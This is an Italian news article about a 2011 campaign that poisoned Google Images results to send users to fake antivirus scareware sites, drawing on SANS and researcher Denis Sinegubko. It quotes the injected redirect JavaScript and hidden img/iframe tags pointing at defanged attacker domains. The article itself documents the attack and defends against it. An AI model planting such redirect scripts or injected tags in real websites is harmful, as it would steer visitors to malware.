Google Immagini, virus infettano il motore di ricerca immagini Google

Un nuovo allarme per la sicurezza legato a Google Immagini è stato lanciato da alcuni ricercatori. Il servizio fornito da Google per la ricerca di immagini nel web sarebbe finito nel mirino di un gruppo di cybercriminali, i quali avrebbero ideato un sistema in grado di sfruttare i click provenienti dal servizio per reindirizzare ignari visitatori verso apposite pagine. Per diverse settimane, alcuni lettori si sono lamentati che cliccando sui risultati di Google Immagini vengono diretti alle pagine Web che spingono a scaricare rogue anti-virus e scareware, dando vita ad allarmi di sicurezza e avvertenze fuorvianti.

Mercoledì scorso, il SANS Internet Storm Center ha inserito un post sul blog dicendo che stavano ricevendo segnalazioni sulle ricerche di Google Immagini che portanp a falsi siti anti-virus. Secondo il SANS, gli aggressori hanno compromesso un numero imprecisato di siti con script maligni che creano pagine web pieni di termini di ricerca spinti in alto da Google Trends. Gli script maligni scaricano anche immagini da siti di terze parti e le inseriscono nelle pagine di spazzatura accanto ai termini di ricerca pertinenti, in modo che la pagina Web generata automaticamente contenga oggetti di visualizzazione legittimi. 

Google Image Search bots infine indicizza questo contenuto fasullo. Se gli utenti sono alla ricerca di parole o frasi che hanno un elevato ranking di ricerca nelle condizioni attuali, è probabile che le miniature delle pagine "maligne" saranno visualizzate accanto altri risultati legittimi. Come il gestore di SANS Bojan Zdrnja spiega l'exploit accade quando un utente fa clic su una di queste miniature contaminate. "Qui si trova la 'vulnerabilità'", ha scritto Zdrnja. 

"Il browser dell'utente invia automaticamente una richiesta alla pagina cattiva che gestisce lo script attaccante. Questo script controlla il campo di richiesta refferer e se contiene Google (ciò significa che questo è stato un clic sulla pagina dei risultati di Google), lo script visualizza un piccolo JavaScript... [che] fa sì che il browser venga reindirizzato ad un altro sito che sta servendo FakeAV . Google sta facendo un buon lavoro relativamente all'asportazione (o almeno la marcatura), dei link che portano a malware nelle ricerche normali, tuttavia, la ricerca immagini di Google sembra essere afflitta da link pericolosi".

<script>var url = "http://REMOVED/in.cgi?2&seoref="+encodeURIComponent(document.referrer)+"¶meter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=default"; if (window!=top) {top.location.href = url;} else document.location= url; </script>

Denis Sinegubko, un ricercatore malware russo che ha studiato la campagna fake anti-virus, ha chiamato questa tattica "the most efficient black hat trick ever", e ha detto che è estremamente facile da configurare. Ha ricevuto il log di accesso dai propietari dei vari siti compromessi, e ha utilizzato i dati per stimare il traffico di Google che invia a queste immagini nelle pagine di ricerca fasulle. 

Sinegubko calcola che ci sono più di 5.000 siti compromessi, e che il sito mediamente è stato iniettato con circa 1.000 di queste pagine false. La pagina riceve in media un visitatore proveniente da Google ogni 10 giorni circa, il che significa che Google rimanda circa mezzo milione di visite a siti fake-antivirus ogni giorno, o circa 15 milioni di visite ogni mese. Per esempio, Sinegubko ha visto il log di accesso ad uno dei siti compromessi  in Croazia, che aveva un Page Rank di Google pari a zero prima di essere compromesso con l'immagine script di ricerca fasulla.

<img heigth="1" width="1" border="0" src="hxxp://myteenmovies .net/t.php?id=5360168"><br /> <br /> or<br /> <br /> <iframe heigth="1" width="1" frameborder="0" src="hxxp://curem .net/t.php?id=1517731"></iframe><br /> <br /> Update (May 6th, 2011) or<br /> <br /> <img heigth="1" width="1" border="0" src="hxxp://imgddd .net/t.php?id=15433533">

I registri hanno mostrato che il sito era stato violato il 18 Marzo 2011, e che Google ha iniziato a indicizzare le pagine di immagine contaminate il giorno successivo. "Durante le successive cinque settimane ha indicizzato più di 27.000 doorway  di questo sito", ha scritto in un blog post delle sue scoperte. "Durante le stesse 5 settimane di ricerca, Google Immagini ha inviato più di 140 mila visitatori a questo piccolo sito". 

Sinegubko sta sviluppando un add-on per Firefox che può individuare i risultati di ricerca maligni di Google Immagini inserendo un riquadro rosso intorno alle immagini che sembrano collegarsi a siti ostili. Le immagini con un riquadro rosa pallido intorno ad esse potranno anche essere dannose, ha detto Sinegubko. I ricercatori di KrebsOnSecurity hanno testato l'add-on (che non è pronto per il rilascio pubblico) alla ricerca della copertina dell'album "Kaputt" della Destroyer band canadese. Come potete vedere dall'immagine qui sotto,

la maggior parte delle immagini restituite rimandano a link di siti contraffatti che spingono anti-virus. Sinegubko ha detto che la sua analisi degli script dannosi indica che le pagine di spam sono costruite quando Googlebot tenta di indicizzarle. Ogni pagina fasulla ha come obiettivo specifiche parole chiave, in questo caso, "Destroyer". 

Lo script quindi invia a Google i risultati per il completamento automatico della parola "Destroyer", e ottiene il suggerimento di 10 parole chiave. Lo script include poi quelle nuove parole chiave nelle pagine di spam come collegamenti a "ricerche correlate" (ad esempio, link a "23.php? Q = destroyer-droid-start-wars", ed i risultati nell'immagine qui sopra, "23 . php? q = destroyer-kaputt-album-cover "." Quando Googlebot segue tali legami, lo script genera le pagine di spam per loro, allo stesso tempo si inserisce link a nuove ricerche suggerite", ha detto il ricercatore in un messaggio immediato di chat con KrebsOnSecurity. 

"Questo modo di Google suggerisce nuove parole chiave per le pagine di spam e genera automaticamente lo spam e gli indici di esso". Diversi esperti di sicurezza hanno suggerito misure specifiche che Google potrebbe intraprendere per ridurre i le truffe che utilizzano Google Immagini, come abbassare la classifica dei siti delle immagini che riportano a  hot-link in base alle chiavi di ricerca. Il portavoce di Google Jay Nancarrow ha detto che la società era a conoscenza degli attacchi e che sta facendo "sforzi attivi per migliorare sia la qualità dei risultati e sia l'individuazione di malware", ma non è stato più specifico. 

"Stiamo migliorando, per trovare la soluzione agli attacchi delle persone che mettono gli utenti a rischio, e nell'interesse di tali utenti è meglio non rivelare tutto quello che stiamo facendo su questo". Truffe rogue anti-virus quasi sempre contano su script dannosi che possono essere bloccati da un eccellente add-on NoScript per Firefox, che consente di decidere quali siti devono essere autorizzati ad eseguire gli script. Se vi capita di imbattervi in uno di questi falsi allarmi di sicurezza anti-virus, mantenere la calma ed evitate la tentazione di scegliere il vostro modo di uscirne. Invece, basta premere Ctrl-Alt-Canc, selezionare il processo del browser che si sta utilizzando (firefox.exe, iexplore.exe, ecc) e terminarlo.